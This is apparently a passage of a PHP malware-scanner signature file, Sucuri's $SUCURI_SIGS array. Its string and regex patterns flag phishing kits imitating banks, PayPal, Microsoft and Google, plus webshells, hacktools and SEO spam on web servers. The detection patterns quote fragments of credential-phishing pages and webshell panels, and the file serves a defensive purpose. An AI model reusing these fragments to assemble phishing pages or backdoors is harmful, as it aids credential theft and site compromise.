/* 33F190D04D71-0B067FFC03A6-1810FA8DBECA */
@set_time_limit(0);
@ini_set("max_execution_time",0);
@set_time_limit(0);
@ignore_user_abort(TRUE);

$myversion='20200908_1822';

//String types
define('STR_TRIGGER',             10);
define('STR_PATH_TRIGGER',        11); // Trigger signature based on filename/directory name
define('STR_CHAIN_TRIGGER',       15); // When triggered it'll load all its nested signatures as 'nonstop' cleanup
define('STR_WARN',                0);
define('STR_CLEARFILE',           1);
define('STR_CLEARLINE',           2);
define('STR_CLEAR_LINEMATCH',     3);
define('STR_CLEAR_MULTIMATCH',    4);
define('STR_CLEAR_NONCONTINUAL',  6);
define('STR_STOP',                5);
define('STR_WHITE',               17);
define('STR_FILENAME',            8); // Signature to trigger suspicious filenames
define('STR_DIRNAME',             9); // Signature to trigger suspicious filenames
define('STR_INV',                 7); //Investigation signature
define('STR_HARDEN',              13); //HARDENING signature
define('STR_IMGMATCH',            14); //HARDENING signature

//Regex types (these triggers are regex enabled) always have to be bigger than 1000:
define('REX_TRIGGER',             1200);
define('REX_PATH_TRIGGER',        1201); // Trigger signature based on filename/directory name - regex based
define('REX_CHAIN_TRIGGER',       1203); // When triggered it'll load all its nested signatures as 'nonstop' cleanup
define('REX_WARN',                1000);
define('REX_CLEARFILE',           1001);
define('REX_CLEAR_LINEMATCH',     1003);
define('REX_CLEAR_MULTIMATCH',    1004);
define('REX_CLEAR_NONCONTINUAL',  1006);
define('REX_STOP',                1005);
define('REX_WHITE',               1007);
define('REX_FILENAME',            1008); // Signature to trigger suspicious filenames
define('REX_DIRNAME',             1009); // Signature to trigger suspicious filenames
define('REX_INV',                 1010); //Investigation Signature
define('REX_HARDEN',              1011); //Hardening signature
define('REX_IMGMATCH',            1012);

//Experimental types
define('EXP_BLK',                 1901);
define('EXP_SPAM',                1902);
define('EXP_INC',                 1903);
define('EXP_HASH',                1904);
define('EXP_SIM',                 5000);

$SUCURI_SIGS = array( /* We start the array here */

'<title' => array(STR_TRIGGER,

	'Login' => array(STR_TRIGGER,

		'GoDaddy' => array(STR_TRIGGER,
			'fwrite($file,"Password' => array(STR_CLEARFILE, 'php.phishing.godaddy.001', NULL),
			'<title>Verify Email</title>' => array(STR_CLEARFILE, 'php.phishing.godaddy.002', NULL),
			'<title>LOG IN' => array(STR_CLEARFILE, 'html.phishing.godaddy.002', NULL),
			'uxel.urls.myPinUrl = \'https://mya.godaddy.com/pin' => array(STR_CLEARFILE, 'php.phishing.godaddy.005', NULL),
		),

		'<title>Alibaba&nbsp;Manufacturer&nbsp;Directory&nbsp;-' => array(STR_TRIGGER,
			'>Login to Message Center<' => array(STR_CLEARFILE, 'html.phishing.alibaba.002', NULL),
			'invalid username or password' => array(STR_CLEARFILE, 'html.phishing.alibaba.002.02', NULL),
			'javascript:void(0);">Sign in to Alibaba.com</a>' => array(STR_CLEARFILE, 'html.phishing.alibaba.002.03', NULL), 
		),

		'<title>onedrive</title>' => array(STR_TRIGGER,
			'var x = document.forms["onedrive"]["email"].value;' => array(STR_CLEARFILE, 'html.phishing.onedrive.001', NULL),
		),

		'<title>Email Login</title>' => array(STR_TRIGGER,
			'<strong>Dropbox</strong>' => array(STR_CLEARFILE, 'html.phishing.dropbox.003', NULL),
		),

		'<title>Stripe: Login</title>' => array(STR_TRIGGER,
			'https://a.stripecdn.com/manage/assets' => array(STR_CLEARFILE, 'html.phishing.stripe.001', NULL),
		),

		'<title>AT&amp;T - Login</title>' => array(STR_CLEARFILE, 'html.phishing.generic.058', NULL),
		'<title>Log In | FastMail</title>' => array(STR_CLEARFILE, 'html.phishing.fastmail.001', NULL),
		'<title>Daum' => array(STR_CLEARFILE, 'html.phishing.daum.001', NULL),
		'<title>Webmail Login<' => array(STR_CLEARFILE, 'html.phishing.webmail.002', NULL),
		'<title>Discover Card Account Center Login' => array(STR_CLEARFILE, 'html.phishing.discover.002', NULL),
		'<title>EasyWeb - Login to our secure financial services' => array(STR_CLEARFILE, 'php.phishing.TDCanada.002.03', NULL),
		'>myAT&amp;T Login - AT&amp;T Account Management, Pay Bill, Check Usage<' => array(STR_CLEARFILE, 'html.phishing.ATT.002', NULL),
		'<title>LCL - Le Crédit Lyonnais</title>' => array(STR_CLEARFILE, 'html.phishing.lcl.001', NULL),
		'<title>Aqui a Black Friday' => array(STR_CLEARFILE, 'php.phishing.blackfriday.001', NULL),
		'<title>The Pirate Bay' => array(STR_CLEARFILE, 'html.phishing.thepiratebay.001', NULL),
		'<title>Visa Inc' => array(STR_CLEARFILE, 'php.phishing.visa.001', NULL),
		'<title>Capitec Internet Banking' => array(STR_CLEARFILE, 'html.phishing.capitec.001', NULL),
		'First National Bank - FNB</title>' => array(STR_CLEARFILE, 'html.phishing.FNB.001', NULL),
		'<title>FNB - Internet Bank' => array(STR_CLEARFILE, 'html.phishing.FNB.001.02', NULL),
		'<title>Sign in - Apple' => array(STR_CLEARFILE, 'html.phishing.apple.016.02', NULL),
		'<title>Stripe: Login' => array(STR_CLEARFILE, 'html.phishing.stripe.002', NULL),
		'<title>American Express' => array(STR_CLEARFILE, 'html.phishing.americanexpress.010', NULL),
		'<title id="pageTitle">Facebook' => array(STR_CLEARFILE, 'html.phishing.facebook.006', NULL),
		'>Personal Informations</title>' => array(STR_CLEARFILE, 'html.phishing.generic.067', NULL),
		'var domainName=\'online.citi.com\';' => array(STR_CLEARFILE, 'php.phishing.citibank.001', NULL),
		'<title>Email Account | WebMail Login<' => array(STR_CLEARFILE, 'html.phishing.webmail.003', NULL),
		'$cardInfo = bankDetails($card_number);' => array(STR_CLEARFILE, 'php.phishing.cc_mailer.003', NULL),
		'My EE login' => array(STR_CLEARFILE, 'php.phishing.EE_Limited.001', NULL),
		'title>Centurylink | Login</title>' => array(STR_CLEARFILE, 'php.phishing.centurylink.001', NULL),
		'https://www.docusign.net/Member' => array(STR_CLEARFILE, 'php.phishing.docusign.001', NULL),
		'<title>Log in to your PayPaI account' => array(STR_CLEARFILE, 'html.phishing.paypal.023', NULL),
		'<title>Secure Login' => array(STR_CLEARFILE, 'php.phishing.generic.075', NULL),
		'Roundcube Webmail Login' => array(STR_CLEARFILE, 'html.phishing.webmail.004', NULL),
		'<title>Sign In to Manage Your Services | Optimum' => array(STR_CLEARFILE, 'php.phishing.optimum.001', NULL),
		'<title>LANDBANK' => array(STR_CLEARFILE, 'php.phishing.landbank.003', NULL),
		'<title>BPI Online' => array(STR_CLEARFILE, 'php.phishing.BPI.001', NULL),
		'&copy; Telekom Deutschland GmbH' => array(STR_CLEARFILE, 'html.phishing.telekom_deutschland.001', NULL),
		'Adobe Online Services' => array(STR_CLEARFILE, 'html.phishing.adobe.011', NULL),
		'Use Facebook Account to Login' => array(STR_CLEARFILE, 'php.phishing.facebook.002', NULL),
		'[<a href="?a=c">Connection</a>] [<a href="?a=o">Orders</a>] [<a href="?a=a">Add admin</a>] [<a href="?a=l">Admin list' => array(STR_CLEARFILE, 'php.backdoor.magento-login.006', NULL),
		'echo "<table><form method=\'get\' action=\'wpq.php\'><tr><td><label>Stylesheet:' => array(STR_CLEARFILE, 'php.hacktool.dbshell.003', NULL),
	),

	'Account' => array(STR_TRIGGER,

		'We\'re just checking your information</span>' => array(STR_TRIGGER,
			'<h1>Tax Refund</h1>' => array(STR_CLEARFILE, 'php.phishing.uk_gov.001', NULL),
		),

		'Chase Online -' => array(STR_CLEARFILE, 'html.phishing.chase.001.09', NULL),
		'content="Verified by Visa' => array(STR_CLEARFILE, 'php.phishing.visa.001.03', NULL),
		'<title> Update Accounts - PayPal' => array(STR_CLEARFILE, 'html.phishing.paypal.001.004', NULL),
		'<title>Wells Fargo&nbsp;Sign On to View Your Accounts</title>' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.002.002', NULL),
		'<title>Change payment details | Your Account | BT.com</title>' => array(STR_CLEARFILE, 'html.phishing.bt.001', NULL),
		'<title>TD Canada Trust Accounts' => array(STR_CLEARFILE, 'php.phishing.TDCanada.002', NULL),
		'>One Account. All of Google' => array(STR_CLEARFILE,'php.phishing.google.002', NULL),
		'>Discover Card Account Number</font>' => array(STR_CLEARFILE, 'html.phishing.generic.021', NULL),
		'/A-mail.php" method="POST">' => array(STR_CLEARFILE, 'php.phishing.generic.048', NULL),
		'/us1.php" method="POST">' => array(STR_CLEARFILE, 'php.phishing.generic.049', NULL),
		'/incc.php" method="POST">' => array(STR_CLEARFILE, 'php.phishing.generic.050', NULL),
		'/send-email2.php" method="POST">' => array(STR_CLEARFILE, 'php.phishing.generic.051', NULL),
		'<title>NAB - Member Satisfaction Survey' => array(STR_CLEARFILE, 'html.phishing.generic.033', NULL),
		' <aziz>" . "\r\n";' => array(STR_CLEARFILE, 'php.phishing.redirect.012', NULL),
		'method=post onsubmit="return checkLogin()' => array(STR_CLEARFILE, 'html.phishing.earthlink.001', NULL),
		'<title>Alibaba&nbsp;Manufacturer' => array(STR_CLEARFILE, 'html.phishing.alibaba.003', NULL),
		'*Your Email Provider Requires Authentication* *Please Login to View Document*' => array(STR_CLEARFILE, 'html.phishing.adobe.003', NULL), 
		'<title>Vehicle Tax Refund</title>' => array(STR_CLEARFILE, 'php.phishing.uk_gov.001.02', NULL),
		'Wells Fargo</title>' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.006', NULL),
		'<h1>Confirm your details to claim your money</h1>' => array(STR_CLEARFILE, 'php.phishing.generic.066', NULL),
		'dynamic virtual keyboard' => array(STR_CLEARFILE, 'html.phishing.generic.034', NULL),
	),

	'Microsoft' => array(STR_TRIGGER,
	
		'Microsoft Exchange Server' => array(STR_TRIGGER,
			'<title>Microsoft Outlook Web Access<' => array(STR_CLEARFILE, 'html.phishing.outlook.002', NULL),
		),
		
		'helpdesk.ainfosec.com' => array(STR_WHITE,
			'<title>Sign In</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.006', NULL),
		),

		'>Rename your personal Microsoft' => array(STR_CLEARFILE, 'html.phishing.microsoft.004', NULL),
		'="TextSemiBold">Sign up now</a></div></div><div id="SignUpTD"' => array(STR_CLEARFILE, 'html.phishing.hotmail.006', NULL),
		' Microsoft</span><a href="#" id="ftrTerms">Terms</a><a href="#"' => array(STR_CLEARFILE, 'html.phishing.hotmail.005', NULL),
		'<title>Microsoft Excel<' => array(STR_CLEARFILE, 'html.phishing.microsoft.002', NULL),
		'src="./Sign in to your Microsoft account' => array(STR_CLEARFILE, 'html.phishing.hotmail.010', NULL),
		'<title>Secure Email Portal</title>' => array(STR_CLEARFILE, 'php.phishing.microsoft.002', NULL),
		'<span>Use your Microsoft' => array(STR_CLEARFILE, 'php.phishing.microsoft.001', NULL),
		'urlPost:\'connectID.php\'' => array(STR_CLEARFILE, 'html.phishing.hotmail.007', NULL), 
		'form action="login.php" method="POST" name="logonForm"' => array(STR_CLEARFILE, 'html.phishing.hotmail.008', NULL),
		'signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl' => array(STR_CLEARFILE, 'html.phishing.hotmail.009', NULL),
		'"Password" type="password" name="passwd" value=""' => array(STR_CLEARFILE, 'html.phishing.microsoft.005', NULL),
		'We detected something unusual about a recent sign-in to the Microsoft account' => array(STR_CLEARFILE, 'html.phishing.hotmail.012', NULL),
		'<title>Sign in to your account</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.006.02', NULL),
		'<title>Microsoft Office | Share, Upload, Extract</title>' => array(STR_CLEARFILE, 'php.phishing.microsoft.005', NULL),
		'Office 365 Login' => array(STR_CLEARFILE, 'html.phishing.microsoft.024', NULL),
		'Microsoft Excel Online' => array(STR_CLEARFILE, 'html.phishing.microsoft.025', NULL),
	),

	'Google' => array(STR_TRIGGER,

		'<title>E-mail account validation<' => array(STR_TRIGGER,
			'>Powered By Google Docs 201' => array(STR_CLEARFILE, 'php.phishing.gmail.006', NULL),
		),
		
		'Sign in to continue to Gmail' => array(STR_TRIGGER,
			'<title>Sign-in to Continue' => array(STR_CLEARFILE, 'html.phishing.google_accounts.007', NULL),
		),

		'<title>Google Docs - Online documents, spreadsheets, presentations, ' => array(STR_CLEARFILE, 'html.phishing.googledocs.002', NULL),
		'<title>Google Accounts</title>' => array(STR_CLEARFILE, 'html.phishing.google_accounts.001', NULL),
		'<title>Verify your - Google Accounts</title>' => array(STR_CLEARFILE, 'html.phishing.google_accounts.002', NULL),
		'<title>Sign in - Google Accounts</title>' => array(STR_CLEARFILE, 'html.phishing.google_accounts.003', NULL),
		'<title>Security Credentials Identification - Google Accounts</title>' => array(STR_CLEARFILE, 'html.phishing.google_accounts.004', NULL),
		'<title>Google Secure Docs' => array(STR_CLEARFILE, 'php.phishing.gmail.002', NULL),
		'<title>Gmail: Email from Google</title>' => array(STR_CLEARFILE, 'php.phishing.gmail.004', NULL),
		'<script type="text/javascript">/* Anti-spam. Want to say hello? Contact (base64)' => array(STR_CLEARFILE, 'php.phishing.gmail.005', NULL),
	),

	'Yahoo' => array(STR_TRIGGER,
		'<title>Sign in to Yahoo' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.002', NULL),
		'<title>Yahoo! Confirmation Process |' => array(STR_CLEARFILE, 'html.phishing.yahoo.004', NULL),
		'<title>Yahoo! - Processing...</' => array(STR_CLEARFILE, 'html.phishing.yahoo.005', NULL),
		':url("https://s.yimg.com/lq/i/reg/login/' => array(STR_CLEARFILE, 'html.phishing.yahoo.006', NULL),
		'<title>Yahoo Mail support Update' => array(STR_CLEARFILE, 'html.phishing.yahoo.007', NULL),
		'<title>Account Update</title>' => array(STR_CLEARFILE, 'html.phishing.yahoo.011', NULL),
		'<title>Account Confirmation' => array(STR_CLEARFILE, 'html.phishing.yahoo.013', NULL),
		'<title>Verify Password</title>' => array(STR_CLEARFILE, 'html.phishing.yahoo.014', NULL),
	),

	'.php">' => array(STR_TRIGGER,

		'Apple ID' => array(STR_TRIGGER,
			'<title><?php echo $lang[\'TITLE1\']; ?></title>' => array(STR_CLEARFILE, 'html.phishing.apple.015', NULL),
		),

		'<title>-Neutrino' => array(STR_CLEARFILE, 'php.backdoor.webshell.096', NULL),
		'2016 Microsoft<' => array(STR_CLEARFILE, 'html.phishing.microsoft.003', NULL),
		'input type="submit" value="Update My Details"' => array(STR_CLEARFILE, 'html.phishing.generic.042', NULL),
		'<title>Email Verified</title>' => array(STR_CLEARFILE, 'html.phishing.generic.063', NULL),
		'<title>Société Générale |' => array(STR_CLEARFILE, 'html.phishing.generic.075', NULL),
		'<title>YouTube' => array(STR_CLEARFILE, 'html.phishing.generic.096', NULL),
	),

	'Western Union' => array(STR_TRIGGER,
		'<title>Western Union Agent Gateway</title>' => array(STR_CLEARFILE, 'html.phishing.westernunion.001', NULL),
		'<title>Western Union Money Transfers - Send Money Online -' => array(STR_CLEARFILE, 'html.phishing.westernunion.002', NULL),
		'href="http://corporate.westernunion.com/index.html" target="">About us</a></li>' => array(STR_CLEARFILE, 'html.phishing.westernunion.003', NULL),
	),

	'setTimeout(' => array(STR_TRIGGER,

		'setTimeout\([\w]+\(\),[\d]+\);' => array(REX_TRIGGER,
			'function [\w]+\(\)[\s]*\{[\s]*[\w]+[\s]*=[\s]*[\w]+\(\);[\s]*[\w]+[\s]*=[\s]*\[[\d]+,[\d]+,[\d]+' => array(REX_CLEARFILE, 'php.spam-seo.generic.041', NULL),
		),

		'var mymessage = "HOW HAPPY IS THE MAN WHO SAYS' => array(STR_CLEARFILE, 'js.defaced.script.018', NULL),
	),

	'Sistemas CASA' => array(STR_WHITE,
		'>DHL |' => array(STR_CLEARFILE, 'html.phishing.dhl.003.02', NULL),
		'>DHL World' => array(STR_CLEARFILE, 'html.phishing.dhl.003.03', NULL),
	),

	'Santander' => array(STR_TRIGGER,
		'"register.cpf" class="input_txt" onblur="validateCPF(this);"' => array(STR_CLEARFILE, 'html.phishing.santander.002', NULL),
		'<a href="#LINKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK' => array(STR_CLEARFILE, 'html.phishing.santander.003', NULL),
	),

	'<title>Mail Settings | Email Upgrade</title>' => array(STR_TRIGGER,
		'<form method="post" action="post.php">' => array(STR_CLEARFILE, 'html.phishing.chinese.003', NULL),
		'splashmessage[0]=\'Verifying your mailbox\'' => array(STR_CLEARFILE, 'html.phishing.chinese.004', NULL),
	),

	'<meta http-equiv="REFRESH" content=' => array(STR_TRIGGER,
		'<title>Loading..' => array(STR_CLEARFILE, 'php.phishing.script.010', NULL),
		'<title>Try Again!' => array(STR_CLEARFILE, 'html.phishing.generic.072', NULL),
	),

	'<title>404 Not Found</title>' => array(STR_TRIGGER,
		'?=$_SERVER[base64_decode(' => array(STR_CLEARFILE, 'php.phishing.paypal.013.02', NULL), 
		'$pills=explode(\'|\',$pills);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-pharma.001', NULL),
	),

	'<form' => array(STR_TRIGGER,
		'<title>Amazon |' => array(STR_CLEARFILE, 'php.phishing.amazon.010', NULL),
		'echo "check PHP version... " . phpversion() . " -------- OK!<br>\n" ;' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.058', NULL),
	),

	'>link to Verification</a>' => array(STR_TRIGGER,
		'don\'t tell people to `click`' => array(STR_TRIGGER,
			'<title>Page Redirection</title>' => array(STR_CLEARFILE, 'html.phishing.redirect.003', NULL),
		),
	),

	'<script>window.location=' => array(STR_TRIGGER,
		'if(isset($_GET[\'email\']))' => array(STR_TRIGGER,
			'<title>404 NOT FROUND</title>' => array(STR_CLEARFILE, 'php.phishing.netflix.003', NULL),
		),
	),

	'<title></title>' => array(STR_TRIGGER,
		'var parkingData' => array(STR_TRIGGER,
			'<link media="screen" href="/css/style.css?rte' => array(STR_CLEARFILE, 'php.spam-seo.generic.043', NULL),
		),
	),

	'if($_GET[' => array(STR_TRIGGER,
		');exit;}' => array(STR_TRIGGER,
			'window.location.href' => array(STR_CLEARFILE, 'php.phishing.generic.093', NULL),
		),
	),

	'<title>WebMail</title>' => array(STR_TRIGGER,
		'www.outitgoes.com/images/bg_loginbox.png' => array(STR_CLEARFILE, 'html.phishing.outitgoes.001', NULL),
	),

	'Log In | Xoom' => array(STR_TRIGGER,
		'<a href="/online-security-and-privacy-at-xoom"' => array(STR_CLEARFILE, 'html.phishing.xoom.001', NULL),
	),

	'<title>MailBox | Renewal Portal</title>' => array(STR_TRIGGER,
		'<input name="formtext2" placeholder="Password" type="text"' => array(STR_CLEARFILE, 'html.phishing.mailbox_renewal.001', NULL),
	),

	'.php" id="login" autocomplete="off" method="post' => array(STR_TRIGGER,
		'>Netflix' => array(STR_CLEARFILE, 'html.phishing.netflix.001', NULL),
	),

	'document.getElementById("apple' => array(STR_TRIGGER,
		'input placeholder="Apple ID"' => array(STR_CLEARFILE, 'html.phishing.apple.016.03', NULL),
	),

	'<h1>Tax Refund</h1>' => array(STR_TRIGGER,
		'>This refund will be credited to your credit/debit card ending <?php echo $_SESSION' => array(STR_CLEARFILE, 'php.phishing.gov_uk.002', NULL),
	),

	'HTTP-EQUIV="Refresh' => array(STR_TRIGGER,
		'jtdeal.in' => array(STR_CLEARFILE, 'html.phishing.amazon.009', NULL),
	),

	'bitcoin' => array(STR_TRIGGER,
		'<title>Verified</title>' => array(STR_CLEARFILE, 'html.phishing.dhl.005', NULL),
	),

	'>Outlook.com<' => array(STR_TRIGGER,
		'<title>Thank You</title>' => array(STR_CLEARFILE, 'html.phishing.outlook.003', NULL),
	),

	'LogMeIn' => array(STR_TRIGGER,
		'method="post" action="check.php"' => array(STR_CLEARFILE, 'html.phishing.logmein.001', NULL),
	),

	'action="submit.php"' => array(STR_TRIGGER,
		'optiRealPersonContent" class="livechat chat-button window-open text-online video-offline"><span class="hidden">Live Chat</span>' => array(STR_CLEARFILE, 'html.phishing.netflix.003', NULL),
	),

	'chase.com' => array(STR_TRIGGER,
		'JPMorgan Chase' => array(STR_CLEARFILE, 'html.phishing.chase.006', NULL),
	),

	'<p>The &#65;p&#112;l&#101; Online Store uses' => array(STR_TRIGGER,
		'&#65;p&#112;l&#101; Inc. All rights reserved.</a></div>' => array(STR_CLEARFILE, 'html.phishing.apple.012', NULL),
	),

	'<meta content="#description#" name="description"/>' => array(STR_TRIGGER,
		'<title>[\s]*#title#[\s]*<.title>' => array(REX_CLEARFILE, 'html.spam-seo.spam_template.001', NULL),
	),

	'function check_br()' => array(STR_TRIGGER,
		'<title>[TITLE]</title>' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.104', NULL),
	),

	'Opps! The username does not exist. Please, try again or sign up.' => array(STR_WHITE,
		'<title>Sign In |' => array(STR_CLEARFILE, 'php.phishing.generic.078', NULL),
	),

	'<title> PayPaI : Next Step</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.022', NULL),
	'<title>Lοg in tο yοur ΡayΡal accοunt<' => array(STR_CLEARFILE, 'html.phishing.paypal.021', NULL),
	'<title>Docusign' => array(STR_CLEARFILE, 'html.phishing.docusign.001', NULL),
	'Docusign<' => array(STR_CLEARFILE, 'html.phishing.docusign.001.02', NULL),
	'<title>By MiLwrOM' => array(STR_CLEARFILE, 'php.defaced.generic.013', NULL),
	'echo("Loading You to the main page , Please Wait...")' => array(STR_CLEARFILE, 'html.phishing.redirect.004', NULL),
	'<title>IndoXploit' => array(STR_CLEARFILE, 'html.phishing.indoxploit.001', NULL),
	'<title>Match.com:' => array(STR_CLEARFILE, 'html.phishing.generic.057', NULL),
	'<title>KeyBase Web Panel' => array(STR_CLEARFILE, 'php.malware.keybase_panel.001', NULL),
	'mail.ru</span>' => array(STR_CLEARFILE, 'html.phishing.mail_ru.001', NULL),
	'<title>costcosupply' => array(STR_CLEARFILE, 'html.phishing.costco.001', NULL),
	'<title>American Express Company' => array(STR_CLEARFILE, 'html.phishing.americanexpress.009', NULL),
	'X Tube Movies. Premium Sex Clip' => array(STR_CLEARFILE, 'html.spam-seo.pornspam.002', NULL),
	'<title>Dropbox<' => array(STR_CLEARFILE, 'html.phishing.dropbox.006', NULL),
	'&Rho;ay&Rho;al' => array(STR_CLEARFILE, 'php.phishing.paypal.014', NULL),
	'<title>Yahoo! - login' => array(STR_CLEARFILE, 'html.phishing.yahoo.010', NULL),
	'<title>Outlook - Sign In' => array(STR_CLEARFILE, 'html.phishing.outlook.001', NULL),
	'<title>Other Email Provider' => array(STR_CLEARFILE, 'html.phishing.generic.051', NULL),
	'<title>Google Drive - Online documents' => array(STR_CLEARFILE, 'html.phishing.googledocs.007', NULL),
	'<title>GMAIL SIGN IN' => array(STR_CLEARFILE, 'html.phishing.gmail.001', NULL),
	'<title>GMAlL SIGN IN' => array(STR_CLEARFILE, 'html.phishing.gmail.001.02', NULL),
	'<title>File Infected' => array(STR_STOP, 'php.hacktool.ransomware.001.02', NULL),
	'echo("loading To PayPal' => array(STR_CLEARFILE, 'php.phishing.redirect.018', NULL),
	'<title>3-D Secure Anmeldung' => array(STR_CLEARFILE, 'html.phishing.onlinebanking.004', NULL),
	'<title>Welcome to Facebook' => array(STR_CLEARFILE, 'html.phishing.facebook.003', NULL),
	'DHL Express Tracking</title>' => array(STR_CLEARFILE, 'php.phishing.DHL.004', NULL),
	'<title>Netflix' => array(STR_CLEARFILE, 'php.phishing.netflix.002', NULL),
	'Adobe Sign In</title>' => array(STR_CLEARFILE,'html.phishing.adobe.002', NULL),
	'<title>Verify Apple ID' => array(STR_CLEARFILE, 'html.phishing.apple.011', NULL),
	'<title>SFR - Confirmation des donn' => array(STR_CLEARFILE, 'html.phishing.sfr.003', NULL),
	'<title>PayPal&trade;<' => array(STR_CLEARFILE, 'html.phishing.paypal.007', NULL),
	'<title>WÐµlÑÐ¾mÐµ TÐ¾ Ð Ð°ÑƒÑ€Ð°l.</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.001.010', NULL,1),
	'<title>Googledocs Secure</title>' => array(STR_CLEARFILE, 'html.phishing.googledocs.001', NULL),
	'<title>SFR - Mise' => array(STR_CLEARFILE, 'html.phishing.sfr.004', NULL),
	'<title>Espace Client SFR' => array(STR_CLEARFILE, 'html.phishing.sfr.005', NULL),
	'<title>\s*[Dd]rop[Bb]ox\W+(?:[BbUuSsIiNnEeSsSs]|[SsIiLlGgNn\s]){7,8}' => array(REX_CLEARFILE, 'html.phishing.dropbox.002', NULL), 
	'<title>Welcome to Verizon Webmail</title>' => array(STR_CLEARFILE, 'html.phishing.verizon.003', NULL),
	'<title>Discover Card: Your Card Has Been Verified</title>' => array(STR_CLEARFILE, 'html.phishing.discover.003', NULL),
	'<title>Banco Bradesco|Pessoa' => array(STR_CLEARFILE, 'html.phishing.bradesco.001', NULL),
	'ica,Exclusive,Prime e Private</title>' => array(STR_CLEARFILE, 'html.phishing.bradesco.001.001', NULL),
	'Atendimento 24 horas, Banco Bradesco S.A. CNPJ 60.746.948/0001-12.</div></td>' => array(STR_CLEARFILE, 'html.phishing.bradesco.002', NULL),
	'<title>Compra Premiada Ourocard e Cielo</title>' => array(STR_CLEARFILE, 'html.phishing.cielo.001', NULL),
	'<title> Apple Store :  </title>' => array(STR_CLEARFILE, 'html.phishing.apple.010', NULL),
	'<title>MBNA Online Card Services<' => array(STR_CLEARFILE, 'html.phishing.mbna.001', NULL),
	'<title>Welcome to UBS e-banking</title>' => array(STR_CLEARFILE, 'html.phishing.UBS.001', NULL),
	'<title>Gmail Verification' => array(STR_CLEARFILE, 'html.phishing.google_accounts.006', NULL),
	'<title>Tangerine bank' => array(STR_CLEARFILE, 'html.phishing.generic.032', NULL), //fixing conflict
	'Chase Online - Done !<' => array(STR_CLEARFILE, 'html.phishing.chase.001.08', NULL),
	'<title>Sign-in :: EC21' => array(STR_CLEARFILE, 'html.phishing.ec21.001', NULL),
	'<title>NAB Internet Banking' => array(STR_CLEARFILE, 'php.phishing.generic.006', NULL),
	'<title>Sign In | LinkedIn' => array(STR_CLEARFILE, 'html.phishing.linkedin.001', NULL),
	'Adobe PDF Online</h1>' => array(STR_CLEARFILE, 'php.phishing.adobe.001', NULL),
	'<title>Yahoo - login' => array(STR_CLEARFILE, 'html.phishing.yahoo.008', NULL),
	'$header="https://www.bankofamerica.com";' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.005', NULL),
	'<title>HBL Bank' => array(STR_CLEARFILE, 'html.phishing.generic.035', NULL),
	'<title>1&amp;1 Kunden-Login' => array(STR_CLEARFILE, 'html.phishing.1and1hosting.001', NULL),
	'<title>Welc&omicron;me' => array(STR_CLEARFILE, 'html.phishing.generic.044', NULL),
	'<title>L&omicron;gging' => array(STR_CLEARFILE, 'html.phishing.generic.045', NULL),
	'document.write(unescape("%3Cbody%3E' => array(STR_CLEARFILE, 'html.phishing.generic.037', NULL),
	'>e-Carte Bleue' => array(STR_CLEARFILE, 'html.phishing.generic.038', NULL),
	'<title>&#71;&#111;&#111;&#103;l&#101;' => array(STR_CLEARFILE, 'php.phishing.google.004', NULL),
	'<p>&Beta;ank of &Alpha;merica' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.009', NULL),
	'My O2 account</title>' => array(STR_CLEARFILE, 'html.phishing.O2.001', NULL),
	'<title>Bancomer.com' => array(STR_CLEARFILE, 'html.phishing.redirect.002', NULL),
	'<link rel="SHORTCUT ICON" href="http://xxx-hacker.net' => array(STR_CLEARFILE, 'php.hacktool.generic.008', NULL),
	'title>WebShell' => array(STR_CLEARFILE, 'php.backdoor.webshell.084', NULL),
	'<title>&#37038;&#31665;&#26356;&#26032;&#35774;&#32622;' => array(STR_CLEARFILE, 'php.phishing.china.001', NULL),
	'&#21319;&#32423;&#20320;&#30340;&#37038;&#31665;' => array(STR_CLEARFILE, 'php.phishing.china.001.02', NULL),
	'- Yahoo</title>' => array(STR_CLEARFILE, 'html.phishing.yahoo.009', NULL),
	'content="Log in to your DocuSign account. DocuSign is the global standard for Digital Transaction Management"><meta content="JavaScript' => array(STR_CLEARFILE, 'html.phishing.generic.043', NULL),
	'>Confirm Your Identity | OurTime.com' => array(STR_CLEARFILE, 'php.phishing.generic.042', NULL),
	'<title>FuckMailer</title>' => array(STR_CLEARFILE, 'php.phishing.generic.046', NULL),
	'<title>Re-Validate Your Mailbox<' => array(STR_CLEARFILE, 'php.phishing.generic.038', NULL),
	'>Windows Email Upgrade' => array(STR_CLEARFILE, 'html.phishing.windows_live_id.003', NULL),
	'<li><a href="javascript:void(0);">Document</a></li>' => array(STR_CLEARFILE, 'html.phishing.microsoft.008', NULL),
	'>Alibaba&nbsp;Manufacturer' => array(STR_CLEARFILE, 'html.phishing.alibaba.004', NULL),
	'<title>Excel Online' => array(STR_CLEARFILE, 'html.phishing.microsoft.010', NULL),
	'<title>Office365 Verification</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.011', NULL),
	'<title>Sign in -Dropbox</title>' => array(STR_CLEARFILE, 'html.phishing.dropbox.007', NULL),
	'FEDEX Express Tracking<' => array(STR_CLEARFILE, 'php.phishing.fedex.002', NULL),
	'>Verify your details</title>' => array(STR_CLEARFILE, 'php.phishing.amazon.005', NULL),
	'>Amazon Sign In</title>' => array(STR_CLEARFILE, 'php.phishing.amazon.006', NULL),
	'<title>impots.gouv.fr' => array(STR_CLEARFILE, 'php.phishing.generic.068', NULL),
	'<title>Welcome to Blackhole!' => array(STR_CLEARFILE, 'php.hacktool.generic.018', NULL),
	'<title>Libero Mail' => array(STR_CLEARFILE, 'php.phishing.libero.003', NULL),
	'<title>&#83;&#105;&#103;&#110;&#32;&#73;&#110;</title>' => array(STR_CLEARFILE, 'html.phishing.generic.068', NULL),
	'<title>Sign in - BMO<' => array(STR_CLEARFILE, 'html.phishing.bmo.002', NULL),
	'>Confirm your account<' => array(STR_CLEARFILE, 'html.phishing.generic.069', NULL),
	'<title>Adobe Document Cloud<' => array(STR_CLEARFILE, 'html.phishing.adobe.005', NULL),
